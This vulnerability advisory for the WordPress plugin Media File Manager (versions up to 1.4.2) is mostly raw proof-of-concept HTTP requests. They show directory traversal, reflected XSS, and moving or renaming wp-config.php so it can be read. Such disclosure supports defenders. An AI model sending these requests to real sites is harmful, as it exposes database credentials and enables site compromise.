Lucene search
Pasquale TuriWPEX-ID:1236335E-EC15-4E43-B9C4-3BA1363E87AFHistoryNov 05, 2018 - 12:00 a.m.
Media File Manager <= 1.4.2 - Authenticated Multiple Vulnerabilities
2018-11-0500:00:00
Pasquale Turi
9
0.002 Low
EPSS
Percentile
56.0%
Following the PoC you can combine the vulnerabilities to obtain PHP code execution and read sensitive file. By default the File Manager can only be used by Administrator users, however, any user role can be configured to use it.
Diretory Trasversal:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: REDACTED
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Connection: close
Cookie: REDACTED
action=mrelocator_getdir&dir=../../../../../../../etc
Reflected XSS:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Connection: close
Cookie: REDACTED
action=mrelocator_getdir&dir=[XSS]
Move any file to any dir:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 75
Connection: close
Cookie: REDACTED
action=mrelocator_move&dir_from=../../&dir_to=../../../&items=wp-config.php
Rename any file:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 97
Connection: close
Cookie: REDACTED
action=mrelocator_rename&dir=../../&from=wp-config.php&to=wp-config.txt Related
openvas
openvas
WordPress Media File Manager Plugin < 1.4.4 Multiple Vulnerabilities
2019-03-06 00:00:00
wpvulndb
wpvulndb
Media File Manager <= 1.4.2 - Authenticated Multiple Vulnerabilities
2018-11-05 00:00:00
cvelist
cvelist
prion
prion
Directory traversal
2019-01-31 19:29:00
Design/Logic Flaw
2019-01-31 19:29:00
Directory traversal
2019-01-31 19:29:00
cve
cve
nvd
nvd